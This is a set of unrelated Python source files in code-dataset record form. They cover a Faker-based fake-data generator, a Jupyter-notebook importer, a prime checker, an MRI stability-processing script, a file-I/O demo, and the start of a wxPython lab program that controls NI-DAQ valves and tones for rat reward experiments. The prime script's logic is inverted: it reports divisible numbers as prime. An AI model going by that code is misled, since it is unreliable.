import datetime\n\nfrom faker import Faker, Generator\n\n# .format language doesn't allow slicing. 
:(\nfirst_name_patterns = (\"{firstname}\", \"{firstname[0]}\", \"{firstname[0]}{firstname[1]}\")\nfirst_name_separators = (\"\", \".\", \"-\", \"_\", \"+\")\nyear_patterns = (\"{year}\", \"{year[2]}{year[3]}\", \"{year[3]}\", \"\")\n\nemail_templates = [\n f\"{first_name}{first_name_separator}{{lastname}}{year}@{{domain}}\"\n for first_name, first_name_separator, year in product(\n first_name_patterns, first_name_separators, year_patterns\n )\n]\n\nthis_year = datetime.today().year\n\n\nclass FakeNames(T.NamedTuple):\n f: Faker\n faker_context: PluginContext = None\n\n # \"matching\" allows us to turn off the behaviour of\n # trying to incorporate one field into another if we\n # need to.\n def user_name(self, matching: bool = True):\n \"Salesforce-style username in the form of an email address\"\n already_created = self._already_have((\"firstname\", \"lastname\"))\n if matching and all(already_created):\n return f\"{already_created[0]}.{already_created[1]}_{self.f.uuid4()}@{self.f.safe_domain_name()}\"\n return f\"{self.f.first_name()}_{self.f.last_name()}_{self.f.uuid4()}@{self.f.hostname()}\"\n\n def alias(self):\n \"\"\"Salesforce-style 8-character alias: really an 8 char-truncated firstname.\n Not necessarily unique, but likely to be unique if you create small\n numbers of them.\"\"\"\n return self.f.first_name()[0:8]\n\n def email(self, matching: bool = True):\n \"\"\"Email address using one of the \"example\" domains\"\"\"\n already_created = self._already_have((\"firstname\", \"lastname\"))\n if matching and all(already_created):\n template = random.choice(email_templates)\n\n return template.format(\n firstname=already_created[0].ljust(2, \"_\"),\n lastname=already_created[1],\n domain=self.f.safe_domain_name(),\n year=str(random.randint(this_year - 80, this_year - 10)),\n )\n return self.f.ascii_safe_email()\n\n def realistic_maybe_real_email(self):\n \"\"\"Like fake: email except that the email domain may be real and therefore\n the email address itself may be real. 
Use with caution, you might\n accidentally email strangers!!!\n \"\"\"\n return self.f.email()\n\n def _already_have(self, names: T.Sequence[str]):\n \"\"\"Get a list of field values that we've already generated\"\"\"\n already_created = self.faker_context.local_vars()\n vals = [already_created.get(name) for name in names]\n return vals\n\n def state(self):\n \"\"\"Return a state, province or other appropriate administrative unit\"\"\"\n return self.f.administrative_unit()\n\n def postalcode(self):\n \"\"\"Return whatever counts as a postalcode for a particular locale\"\"\"\n return self.f.postcode()\n\n\n# we will use this to exclude Faker's internal book-keeping methods\n# from our faker interface\nfaker_class_attrs = set(dir(Faker)).union((dir(Generator)))\n\n\nclass FakeData:\n \"\"\"Wrapper for Faker which adds Salesforce names and case insensitivity.\"\"\"\n\n def __init__(\n self,\n faker_providers: T.Sequence[object],\n locale: str = None,\n faker_context: PluginContext = None,\n ):\n # access to persistent state\n self.faker_context = faker_context\n\n faker = Faker(locale, use_weighting=False)\n for provider in faker_providers:\n faker.add_provider(provider)\n\n fake_names = FakeNames(faker, faker_context)\n\n def no_underscore_name(name):\n return name.lower().replace(\"_\", \"\")\n\n def obj_to_func_list(obj: object, canonicalizer: T.Callable, ignore_list: set):\n return {\n canonicalizer(name): getattr(obj, name)\n for name in dir(obj)\n if not name.startswith(\"_\") and name not in ignore_list\n }\n\n # canonical form of names is lower-case, no underscores\n # include faker names with underscores in case of ab_c/a_bc clashes\n # include faker names with no underscores to emulate salesforce\n # include snowfakery names defined above\n self.fake_names = {\n **obj_to_func_list(faker, str.lower, faker_class_attrs),\n **obj_to_func_list(faker, no_underscore_name, faker_class_attrs),\n # in case of conflict, snowfakery names \"win\" over Faker names\n **obj_to_func_list(fake_names, str.lower, set()),\n **obj_to_func_list(fake_names, no_underscore_name, set()),\n }\n\n def _get_fake_data(self, origname, *args, **kwargs):\n local_faker_vars = self.faker_context.local_vars()\n\n # faker names are all lower-case\n name = origname.lower()\n\n meth = self.fake_names.get(name)\n\n if meth:\n ret = meth(*args, **kwargs)\n local_faker_vars[name.replace(\"_\", \"\")] = ret\n return ret\n\n msg = f\"No fake data type named {origname}.\"\n match_list = get_close_matches(name, self.fake_names.keys(), n=1)\n if match_list:\n msg += f\" Did you mean {match_list[0]}\"\n raise AttributeError(msg)\n","sub_path":"snowfakery/fakedata/fake_data_generator.py","file_name":"fake_data_generator.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"98369300","text":"\n# -*- coding: utf-8 -*-\n\n# .ipynbをimportする\n\n# 使用例1:\n# import ipynb_import_lib\n# ipynb_import_lib.import_ipynb(\"./sample_lib.ipynb\", \"lib1\")\n# lib1.any_func1(...) # 呼び出し等\n\n# 使用例2:\n# import ipynb_import_lib\n# lib1 = ipynb_import_lib.import_ipynb(\"./sample_lib.ipynb\")\n# lib1.any_func1(...) 
# call it, etc.\n\nimport json, ast, re\nimport pathlib, sys\n\ndef main(): # for switching what runs\n pass\n\n# sec: import a .ipynb\n\n# Import the py code of a .ipynb file (generates a .py used for the import)\ndef import_ipynb(path_nb, # path to the .ipynb\n name=None, no_expr=True, # .py file name, exclude expressions\n if_import=True, must_import=False): # import and register in globals, re-import even if already present\n\n # sec: resolve path\n\n if not isinstance(path_nb, pathlib.Path):\n path_nb = pathlib.Path(path_nb)\n\n if name is None: # if: use the same name as the .ipynb\n name = path_nb.stem\n\n path_py = path_nb.parent.joinpath(\"__pycache__\", name + \".py\")\n\n # sec: check whether the .ipynb contents changed\n\n if not path_py.exists() or \\\n path_nb.stat().st_mtime > path_py.stat().st_mtime: # if: updated\n\n # sec: generate the .py\n\n text_code = get_code_from_ipynb(path_nb, no_expr)\n\n path_py.parent.mkdir(exist_ok=True) # create the __pycache__ folder\n\n with open(path_py, 'w', encoding='UTF8') as file:\n file.write(text_code)\n\n # sec: import\n\n if not if_import: # if: only generate the .py\n return\n\n pygl = globals() # variables in the global scope\n if not must_import and name in pygl: # if: already imported\n return pygl[name]\n\n else:\n sys.path.append(str(path_py.parent)) # path to the __pycache__ folder tag:CACH\n\n imported = __import__(name) # caution: cannot load nested names like \"abc.def\"\n # imported = importlib.import_module(name) # __import__ is enough, no need for importlib\n\n sys.path.remove(str(path_py.parent)) # undo tag:CACH\n\n pygl[name] = imported\n return imported\n\ndef test__import_ipynb():\n # Result:\n # <module 'tut1' from '__pycache__\\\\tut1.py'>\n # <module 'tut1' from '__pycache__\\\\tut1.py'>\n # <class 'tut1.DQN'>\n # <module 'official-tut reinforcement_q_learning' from '__pycache__\\\\official-tut reinforcement_q_learning.py'>\n # <class 'official-tut reinforcement_q_learning.DQN'>\n\n PATH_NB = \"./official-tut reinforcement_q_learning.ipynb\"\n import_ipynb(PATH_NB, \"tut1\")\n print(tut1)\n import_ipynb(PATH_NB, \"tut1\") # 2nd time\n print(tut1)\n print(tut1.DQN)\n\n tut2 = import_ipynb(PATH_NB)\n print(tut2)\n print(tut2.DQN)\n# main = test__import_ipynb\n\n# Get the py code (as a string) from a .ipynb file\ndef get_code_from_ipynb(path_nb, # path to the .ipynb\n no_expr=True): # exclude expressions defined at global scope\n # not supported: multi-line \"\"\"...\"\"\" strings cannot be commented out\n\n # sec: load\n\n with open(path_nb, 'rb') as file:\n json_root = json.load(file)\n\n # sec: code cell\n\n re_ipy = re.compile(r\"(^%|^!)\", re.MULTILINE)\n text_code = \"\"\n for elem_i in json_root[\"cells\"]:\n\n if elem_i[\"cell_type\"] != \"code\":\n continue\n\n text = \"\".join(elem_i[\"source\"])\n text = re_ipy.sub(\"# NOT-PY: \\\\1\", text)\n\n text_code += \"\\n# ---------- cell ----------\\n\\n\" + text + \"\\n\"\n\n # print(text_code)\n\n if not no_expr: # if: return the code as-is\n return text_code\n\n # sec: AST\n\n text_code += \"\\npass\" # HACK: append an empty element to detect the last line\n\n tree_root = ast.parse(text_code)\n\n # sec: expressions\n\n i_curr = None\n node_curr = None\n expr_list = [] # ranges of expressions defined at global scope [(i_from, i_to), ...]\n for node_i in ast.iter_child_nodes(tree_root):\n\n i_next = get_lineno(node_i) # fixes the line-number range of the previous element\n if i_curr is not None: # if: not the first iteration\n\n if node_curr.__class__.__name__ not in (\n \"Import, ImportFrom, FunctionDef, ClassDef\"):\n\n expr_list.append((i_curr, i_next - 1))\n\n i_curr, node_curr = i_next, node_i\n\n # HACK: the appended pass is already excluded, because we act on the previous element\n\n # print(expr_list)\n\n # sec: split the code into lines\n\n re_line = re.compile(r\"\\r?\\n\")\n lines = re_line.split(text_code)\n lines = lines[:-1] # HACK: drop the appended pass\n\n # sec: comment out the expressions\n\n re_noco = re.compile(r\"^(\\s\\t)*$|^(\\s\\t)*#\")\n for i_from, i_to in expr_list:\n\n for i in range(i_from, i_to + 1):\n if not re_noco.search(lines[i]): # if: the line contains code\n 
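 # blank lines and lines that are already comments are intended to be skipped by re_noco;\n # anything else in the expression range gets the EXPR prefix below so module-level expressions do not run on import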
lines[i] = \"# EXPR: \" + lines[i]\n\n return \"\\n\".join(lines)\n\ndef test__get_code_from_ipynb():\n # 結果:\n # \n # # ---------- cell ----------\n # \n # # NOT-PY: %matplotlib inline\n # \n # # ---------- cell ----------\n # \n # # NOT-PY: !pip show pip\n # \n # # ---------- cell ----------\n # \n # # import gym\n # import math\n # ...(以降略)\n\n PATH_NB = \"./official-tut reinforcement_q_learning.ipynb\"\n text_code = get_code_from_ipynb(PATH_NB)\n print(text_code)\n# main = test__get_code_from_ipynb\n\n# AST Nodeから行番号を取得\ndef get_lineno(node):\n\n try:\n return node.lineno - 1 # 開始番号は1からの為\n except:\n return None\n\n# sec: entry\n\nif __name__ == \"__main__\": main()\n","sub_path":"GraduationWork/v1/ipynb_import_lib.py","file_name":"ipynb_import_lib.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"326623646","text":"#Write a program to find the prime or not.\n\nn=int(input(\"enter the number:\"))\nif n>1:\n for i in range(2,n):\n if (n%i)==0:\n print(n, \"is the prime number\")\n print(i, \"times\", n // i, \"is\", n)\n break\n else:\n print(n,\"is not the prime number\")\n","sub_path":"primenum.py","file_name":"primenum.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"21814486","text":"#!/usr/bin/env python\n\n\"\"\"processstability.py: convert dicoms, run stabilitycalc and stabilitysummary\"\"\"\n\nfrom os.path import join as pjoin\nimport os\nfrom glob import glob\nimport re\nimport logging\nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n\nfrom stabilityfuncs import stabilityparms, dict_from_tsvfile\nfrom dicom2nifti import dicom2nifti\nfrom stabilitycalc import stabilitycalc\nfrom stabilitysummary import stabilitysummary\n\nrawdicomdir = stabilityparms('rawdicomdir')\nsorteddicomdir = stabilityparms('sorteddicomdir')\nprocessedscandir = stabilityparms('processedscandir')\noutputdir = stabilityparms('outputdir')\n\nscantypes = {'epi_bold': 'ep2d_bold_normalize_*',\n 'epi_multiflip10': 'ep2d_multiflip_10_*',\n 'epi_multiflip77': 'ep2d_multiflip_77_*',\n 'epi_pace': 'ep2d_pace_normalize_*',\n 'epi_singleslice': 'epi_stability_single*sPlot*'}\n\n\ndef processstability(session, dicom=True, summ=True, recalc=True):\n \"\"\"main\"\"\"\n\n def name(pattern):\n n = [x for x in glob(pjoin(sorteddicomdir, session, pattern)) if 'adaptive' not in x]\n if not n:\n return ''\n else:\n return n[0]\n\n for scantype, pattern in scantypes.items():\n scan = name(pattern)\n if scan:\n logging.debug('processstability: {}, {}'.format(scantype, scan))\n if recalc:\n _dicom_to_stabilitycalc(dicomseries=scan, niftiname=scantype, dicom=dicom)\n\n if scantype == 'epi_pace':\n analsum = dict_from_tsvfile(pjoin(processedscandir, session, scantype, 'procresults', 'analysissummary.txt'))\n\n for unc in glob(pjoin(sorteddicomdir, session, 'uncombined*')):\n bunc = os.path.basename(unc)\n m = re.search(r'uncombined(H\\d+)_', bunc)\n try:\n ele = m.group(1)\n except AttributeError:\n ele = bunc\n\n ele = 'element_' + ele\n\n logging.debug('processstability: PACE: doing scan={}, unc={}, ele={}'.format(scan, bunc, ele))\n if recalc:\n _dicom_to_stabilitycalc(dicomseries=bunc, niftiname=ele, dicom=dicom, starttime=0,\n initxcenter=analsum['center_of_mass_x'],\n initycenter=analsum['center_of_mass_y'],\n initzcenter=analsum['center_of_mass_z'])\n\n if summ:\n stabilitysummary(processedscandir, 
pjoin(outputdir, '3T', 'birn'), scantype, TargetisBIRNphantom=True)\n\n            if scantype != 'epi_pace':\n                stabilitysummary(processedscandir, pjoin(outputdir, '3T', 'nonbirn'), scantype, TargetisBIRNphantom=False)\n\n    logging.info('processstability done.')\n\ndef _dicom_to_stabilitycalc(dicomseries, niftiname, dicom=True, starttime=10, initxcenter=None, initycenter=None, initzcenter=None):\n\n    if dicom:\n        dicom2nifti(pjoin(sorteddicomdir, session, dicomseries),\n                    pjoin(processedscandir, session), niftiname)\n\n    stabilitycalc(pjoin(processedscandir, session, niftiname), niftiname + '.nii.gz', starttime, initxcenter, initycenter, initzcenter)\n\n\nif __name__ == '__main__':\n    import argparse\n\n    parser = argparse.ArgumentParser(description='Convert DICOMs, run stability{calc,summary}.')\n    parser.add_argument('session', help='The session to work on, relative to SORTEDDICOMDIR or PROCESSEDSCANDIR.')\n    parser.add_argument('--nodicom', help='Do not reprocess DICOM files; assume they are already done.', action='store_true')\n    parser.add_argument('--norecalc', help='Do not reprocess stability; assume it is already done. (Just do summary.)', action='store_true')\n    parser.add_argument('--nosumm', help='Do not reprocess summaries.', action='store_true')\n    args = parser.parse_args()\n\n    session = args.session\n\n    processstability(session, not args.nodicom, not args.nosumm, not args.norecalc)\n","sub_path":"processstability.py","file_name":"processstability.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"466266297","text":"f = open('C:/work/pyzen.txt','wt')\nf.write('at mode test\\n')\nf.write('Added: Beautiful is better than ugly.\\n')\nf.write('Added: Explicit is better than implicit. \\n')\nf.close()\n\nf = open('C:/work/pyzen.txt',mode='r')\ns = f.read()\nprint(s) \nf.close()","sub_path":"writereadfile.py","file_name":"writereadfile.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"627923222","text":"'''\nPyView Version 1.0\n\nThis program handles the Digital Input and Output of the National Instruments DAQmx USB-6509 device.\nThis could be used to run reward-based experiments to train rats and to record the neural activity\nin their gustatory cortex.\n\nLast Updated: August 9, 2011\n\nWritten By: Anupam Gogar [anupamgogar@gmail.com]\nAppended By: Alice Q. Wong [ariqing@gmail.com]\n\n'''\n\nDEVICE_ON = False\n\n'''\nImporting libnidaqmx, the library that interacts with the National Instruments' DLL\nand provides the functionality in Python. DigitalInputTask and DigitalOutputTask are\nclasses defined in Python that activate the input and output tasks.\n'''\n\nif DEVICE_ON:\n    from libnidaqmx import System\n    from libnidaqmx import Device\n    from libnidaqmx import DigitalOutputTask\n    from libnidaqmx import DigitalInputTask\n\n'''\n\nImporting functional libraries for getting time, string manipulation, random number\ngeneration, and multi-threading. 
'wx' is for designing the graphical user interface\nand numpy is for various numerical calculations.\n\n'''\n\n#native w/ python\nfrom threading import Thread\nimport threading\nimport time\nimport string\nimport random\nfrom datetime import datetime\nimport os\n\n#for gui\nimport wx\n\n#for charts\nimport numpy\nimport matplotlib\nmatplotlib.use('WXAgg')\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import _load_bitmap\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport pylab\n\n'''\nGlobal Variables\n'''\nif DEVICE_ON:\n    system = System()\n    dev = system.devices[0]\n\n# all calls to the time.clock() function in this program return\n# the time elapsed since the first call to that function\n\nrandom.seed()\n\nframeName = \"NI-DAQ \"\nif DEVICE_ON:\n    frameName += dev.get_product_type()\n    \n\n'''\nDeliveryThread class, inherited from the Thread class. It takes care of all the\ndeliveries in the experiment, for example taste delivery and tone delivery.\n\nFour parameters are passed to the constructor, namely:\n\n1.) nP, number of pulses\n2.) pI, pulse interval\n3.) rD, reward duration\n4.) mode, 1 stands for Taste Mode and 2 stands for Tone Mode\n\nIn the usual scenario, the number of pulses would be set to 1 and the pulse interval\nwould be set to 0, as we only intend to send one pulse while doing a\nmanual taste or while giving a reward.\n\n'''\n\nclass DeliveryThread (Thread):\n    def __init__( self, nP, pI, rD, mode):\n        Thread.__init__(self)\n\n        # store the passed parameters as attributes of this thread\n        \n        self.np = nP\n        self.pi = pI\n        self.rd = rD\n        self.m = mode\n\n        self.stop_flag = False\n        self.start()\n\n    \n    def run(self):\n        if Frame.Panel1.numValves == 0:\n            Frame.Panel1.logger.AppendText(\"\\nError: no valve selected.\\n\")\n            Frame.Panel1.deliverButton.Enable()\n            return\n        else:\n            if self.m == 1:\n                randValIndex = random.randint(0,Frame.Panel1.numValves - 1)\n                choosenValve = Frame.Panel1.openValves[randValIndex]\n                Frame.Panel1.channelInUse = Frame.Panel1.channels[choosenValve]\n                Frame.Panel1.channelNeuralynx = Frame.Panel1.channels[choosenValve+9]\n            elif self.m == 2:\n                Frame.Panel1.channelInUse = Frame.Panel1.channels[8] #sends to speaker control\n                Frame.Panel1.channelNeuralynx = Frame.Panel1.channels[17] #sends to Neuralynx recorder\n            \n            if DEVICE_ON:\n                taskO_Neuralynx = DigitalOutputTask()\n                taskO_Neuralynx.create_channel(Frame.Panel1.channelNeuralynx)\n                \n                taskO = DigitalOutputTask()\n                taskO.create_channel(Frame.Panel1.channelInUse)\n                \n                taskO_Neuralynx.start()\n                taskO.start()\n                taskO.write(1) # pulse delivered\n                \n                taskO_Neuralynx.write(1)\n                taskO_Neuralynx.write(0)\n                \n                time.sleep(self.rd) #wait for reward duration\n                taskO.write(0) # pulse delivery stopped\n                \n                taskO.stop()\n                taskO.clear()\n                \n                taskO_Neuralynx.stop()\n                taskO_Neuralynx.clear()\n\n            else:\n                time.sleep(self.rd)\n            \n            self.stop()\n            Frame.Panel1.deliverButton.Enable()\n\n    def stop(self):\n        self.stop_flag = True # stop_flag not required here, because no Stop Button\n        if self.m==2:\n            Frame.Panel1.tonePlayed=True\n            Frame.Panel1.tToneAt = time.clock()\n        if self.m==1:\n            Frame.Panel1.tRewardAt = time.clock()\n\nclass MainThread(Thread):\n    def __init__(self):\n        Thread.__init__(self)\n        self.stop_flag = False\n        self.giveReward = False\n        self.redraw_flag = False\n        self.start()\n    \n    def sendTone(self,tn):\n        Frame.Panel1.OnDeliver(None, 1, 0, self.tD, 2)\n        Frame.Panel1.timeStamps.append( ('Tone 
Delivery ',tn) )\n Frame.Panel1.logger.AppendText('\\n\\n%s Tone \\n\\n'% round(tn,2) )\n \n def sendReward(self,tn,tt):\n Frame.Panel1.OnDeliver(None, 1, 0, self.rD, 1)\n Frame.Panel1.timeStamps.append( ('Taste Delivery ',tn) )\n Frame.Panel1.logger.AppendText('\\n\\n%s Taste \\n\\n' % round(tn,2))\n Frame.Panel1.tonePlayed = False\n if Frame.Panel1.deliverManualTaste == 1:\n Frame.Panel2.addPoint(tn-tt+Frame.Panel1.rewardDuration,2)\n Frame.Panel1.numberOfMT+=1\n Frame.Panel1.wManTaste.SetLabel(str(Frame.Panel1.numberOfMT))\n else:\n Frame.Panel2.addPoint(tn-tt+Frame.Panel1.rewardDuration,1)\n Frame.Panel1.numberOfRewards += 1\n Frame.Panel1.wNumRewards.SetLabel(str(Frame.Panel1.numberOfRewards))\n Frame.Panel1.wTimeTone.SetLabel('0.0')\n Frame.Panel1.rewarded = True\n self.redraw_flag = True\n\n def pressedLever(self,tn,tt):\n Frame.Panel1.timeStamps.append( ('Lever Press ',tn) )\n Frame.Panel1.logger.AppendText('%s \\n' % round(tn,2))\n Frame.Panel2.addPoint(tn-tt,0)\n self.redraw_flag = True\n\n def threadAvailable(self):\n if Frame.Panel1.deliveryT!=None:\n if Frame.Panel1.deliveryT.isAlive():\n return False\n else:\n return True\n else:\n return True\n\n\n def run(self):\n \n if DEVICE_ON:\n taskI = DigitalInputTask()\n taskI.create_channel('Dev1/Port0/Line0')\n \n Frame.Panel1.channelNeuralynx2 = Frame.Panel1.channels[18]\n \n taskO_Neuralynx2 = DigitalOutputTask()\n taskO_Neuralynx2.create_channel(Frame.Panel1.channelNeuralynx2)\n \n taskI.start()\n \n t0 = time.clock()\n Frame.Panel1.tRewardAt = t0\n Frame.Panel1.tToneAt = t0\n Frame.Panel1.tonePlayed = False\n Frame.Panel1.rewarded = False\n \n dispExpPastTime = 0.00\n dispTonePastTime = 0.00\n Frame.Panel1.logger.AppendText('\\nExperiment Begins .. Duration: %s seconds\\n' % Frame.Panel1.experimentDuration)\n\n #rD - reward Duration (s), tD - tone Duration (s)\n self.rD = Frame.Panel1.rewardDuration\n self.tD = Frame.Panel1.toneDuration\n\n if DEVICE_ON:\n taskO_Neuralynx2.start()\n #have not exceeded experiment duration\n tCurr = time.clock()\n while (tCurr-t0) < Frame.Panel1.experimentDuration:\n if Frame.Panel1.rewarded:\n Frame.Panel1.tRewardAt = time.clock()\n Frame.Panel1.rewarded = False \n if round(tCurr-t0,2)!=dispExpPastTime:\n dispExpPastTime = round(tCurr-t0,2)\n Frame.Panel1.wExperimentTime.SetLabel(str(dispExpPastTime))\n \n #terminate loop if stop is called\n if self.stop_flag:\n break\n #read from channels\n if DEVICE_ON:\n (data,abc) = taskI.read(samples_per_channel = 1, timeout = -1, fill_mode = 'group_by_channel')\n \n tCurr=time.clock()\n #Test time to play tone?\n if (tCurr - Frame.Panel1.tRewardAt) >= Frame.Panel1.iti:\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n if not(Frame.Panel1.tonePlayed) and self.threadAvailable():\n self.sendTone(tCurr)\n else:\n if round(tCurr-Frame.Panel1.tToneAt,2)!=dispTonePastTime:\n dispTonePastTime = round(tCurr-Frame.Panel1.tToneAt,2)\n Frame.Panel1.wTimeTone.SetLabel( str(dispTonePastTime) )\n\n # Lever Pressed\n if DEVICE_ON:\n lvpressed = (data[0][0] == 1)\n else:\n lvpressed = Frame.Panel1.pseudoPress\n if lvpressed:\n #print \"Lever pressed\"\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n \n tCurr = time.clock()\n minTime = tCurr>(Frame.Panel1.tToneAt+Frame.Panel1.wait)\n maxTime = tCurr<(Frame.Panel1.tToneAt+Frame.Panel1.wait+Frame.Panel1.rewardInterval)\n if Frame.Panel1.tonePlayed and minTime and maxTime:\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n 
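# the lever press fell inside the reward window (tToneAt + wait .. tToneAt + wait + rewardInterval), so deliver a taste reward\n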
self.sendReward(tCurr,Frame.Panel1.tRewardAt)\n else:\n self.pressedLever(tCurr,Frame.Panel1.tRewardAt)\n \n Frame.Panel1.pseudoPress = False\n\n #lever not pressed\n if DEVICE_ON:\n lvNotPressed = data[0][0] == 0\n else:\n lvNotPressed = not(lvpressed)\n \n if lvNotPressed:\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n tCurr = time.clock()\n if Frame.Panel1.deliverManualTaste == 1:\n self.sendReward(tCurr,Frame.Panel1.tRewardAt)\n Frame.Panel1.deliverManualTaste = 0\n tCurr = time.clock()\n if self.redraw_flag:\n Frame.Panel2.Refresh()\n self.redraw_flag = False\n \n# write to file after the experiment has ended \n if self.stop_flag == False:\n writeToFile()\n Frame.Panel1.logger.AppendText('\\nEnd of experiment.\\n')\n \n if DEVICE_ON:\n taskO_Neuralynx2.stop()\n taskO_Neuralynx2.clear()\n \n taskI.stop()\n taskI.clear()\n \n Frame.Panel1.startButton.Enable()\n\n def stop(self):\n self.stop_flag = True\n \n\nclass GraphPanel(wx.Panel):\n def __init__(self,parent,ctrl):\n wx.Panel.__init__(self,parent)\n self.SetBackgroundColour('#FFFFFF')\n self.ctrlPanel = ctrl\n self.initGraph()\n wx.EVT_PAINT(self, self.OnPaint)\n\n\n def initGraph(self):\n self.x0 = []\n self.y0 = []\n self.x1 = []\n self.y1 = []\n self.x2 = []\n self.y2 = []\n self.trial = 1\n \n self.figure = Figure(dpi=100,figsize=(5,8))\n self.axes = self.figure.add_subplot(111)\n self.axes.axis([0,self.ctrlPanel.experimentDuration,1,0])\n self.axes.set_xlabel('time (s)')\n\n bluepts = self.axes.scatter(self.x0, self.y0, c='b',s=10,lw=0.0)\n redpts = self.axes.scatter(self.x1,self.y1, c='r',s=10,lw=0.0)\n purpts = self.axes.scatter(self.x2,self.y2,c='m',s=10,lw=0.0)\n\n startAt = self.ctrlPanel.iti\n endAt = startAt+self.ctrlPanel.toneDuration\n tone = self.axes.axvspan(startAt,endAt,facecolor='g',alpha=0.5,lw=0.0)\n startAt = endAt\n endAt = startAt+self.ctrlPanel.wait\n wait = self.axes.axvspan(startAt,endAt,facecolor='#aeaeae',alpha=0.5,lw=0.0)\n startAt = endAt\n endAt = startAt + self.ctrlPanel.rewardInterval\n reward = self.axes.axvspan(startAt,endAt,facecolor='#FFCCCC',alpha=0.5,lw=0.0)\n\n LText = FontProperties()\n LText.set_size(\"small\")\n \n self.axes.legend((bluepts,redpts,purpts,tone,wait,reward),\n (\"Lever Press\",\"Rewarded Press\",\"Manual Reward\",\"Tone Duration\",\"Wait Interval\",\"Reward Interval\"),\n prop=LText, fancybox=True, bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=2, mode=\"expand\", borderaxespad=0)\n\n self.canvas = FigureCanvas(self, -1, self.figure)\n \n def clearGraph(self):\n self.figure.delaxes(self.axes)\n self.initGraph()\n self.Refresh()\n \n def addPoint(self,t,pcat):\n if pcat==1:\n self.x1.append(t)\n self.y1.append(self.trial)\n self.trial+=1\n self.axes.set_ylim(bottom=self.trial)\n elif pcat==2:\n self.x2.append(t)\n self.y2.append(self.trial)\n self.trial+=1\n self.axes.set_ylim(bottom=self.trial)\n else:\n self.x0.append(t)\n self.y0.append(self.trial)\n \n \n def OnPaint(self, event):\n\n self.bluepts = self.axes.scatter(self.x0, self.y0, c='b',s=10,lw=0.0)\n self.redpts = self.axes.scatter(self.x1,self.y1, c='r',s=10,lw=0.0)\n self.purpts = self.axes.scatter(self.x2,self.y2,c='m',s=10,lw=0.0)\n self.canvas.draw()\n event.Skip()\n\n def OnSetFocus(self, event):\n #self.color = '#0099f7'\n self.color = 'yellow'\n self.Refresh()\n\n def OnKillFocus(self, event):\n self.color = '#b3b3b3'\n self.Refresh()\n\n\nclass MainPanel(wx.Panel):\n \n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n self.quote = wx.StaticText(self, label=\"MAIN 
PANEL\", pos=(200, 10))\n        self.deliveryT = None\n        # bookkeeping for events and deliveries (the multiline log TextCtrl is created below)\n        self.timeStamps = []\n        self.numberOfRewards = 0\n        self.numberOfMT = 0\n        self.deliverManualTaste = 0\n        self.valveArray = numpy.zeros ( 8, int )\n        self.numValves = 0\n        self.openValves = []\n        self.pseudoPress = False\n        # 19 channels\n        '''Channel Menu [Valve1, Valve2, Valve3, Valve4,\n                        Valve5, Valve6, Valve7, Valve8,\n                        Tone1, Neuralynx Pair 1, Neuralynx Pair 2, Neuralynx Pair 3,\n                        Neuralynx Pair 4, Neuralynx Pair 5, Neuralynx Pair 6, Neuralynx Pair 7,\n                        Neuralynx Pair 8, Neuralynx Pair 9, Neuralynx Pair 10]'''\n        self.channels = ['Dev1/Port5/Line5', 'Dev1/Port2/Line7', 'Dev1/Port5/Line7', 'Dev1/Port5/Line4',\n                         'Dev1/Port2/Line4', 'Dev1/Port2/Line5', 'Dev1/Port5/Line6', 'Dev1/Port2/Line6',\n                         'Dev1/Port11/Line7', 'Dev1/Port4/Line7','Dev1/Port4/Line6','Dev1/Port4/Line5',\n                         'Dev1/Port4/Line4','Dev1/Port4/Line3','Dev1/Port4/Line2','Dev1/Port4/Line1',\n                         'Dev1/Port4/Line0','Dev1/Port3/Line7','Dev1/Port3/Line6'] \n        self.tonePlayed = False\n        self.timeSinceTone = 0\n        self.expTime = 0\n        \n        # Default values\n        self.numberPulses = 1\n        self.pulseInterval = 0\n        self.pulseDuration = 100\n        self.experimentDuration = 60\n        self.rewardInterval = 5.0\n        self.rewardDuration = 0.043\n        self.iti = 2\n        self.wait = 0\n        self.toneDuration = 1\n\n        self.channelInUse = ''\n        \n        self.logger = wx.TextCtrl(self, pos=(20,400), size=(400,200), style=wx.TE_MULTILINE | wx.TE_READONLY) \n\n        def OnToggleValve(event):\n            obj = event.GetEventObject()\n            objId = obj.GetId()\n            n = objId - 1\n            if self.valveArray[n] == 1:\n                self.valveArray[n] = 0\n                self.numValves -= 1\n                self.openValves.remove(n)\n            else:\n                self.valveArray[n] = 1\n                self.numValves += 1\n                self.openValves.append(n)\n\n        valve1 = wx.ToggleButton(self, 1, 'Valve 1', (20, 25))\n        valve2 = wx.ToggleButton(self, 2, 'Valve 2', (20, 55))\n        valve3 = wx.ToggleButton(self, 3, 'Valve 3', (20, 85))\n        valve4 = wx.ToggleButton(self, 4, 'Valve 4', (20, 115))\n\n        valve5 = wx.ToggleButton(self, 5, 'Valve 5', (110, 25))\n        valve6 = wx.ToggleButton(self, 6, 'Valve 6', (110, 55))\n        valve7 = wx.ToggleButton(self, 7, 'Valve 7', (110, 85))\n        valve8 = wx.ToggleButton(self, 8, 'Valve 8', (110, 115))\n\n        valve1.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        valve2.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        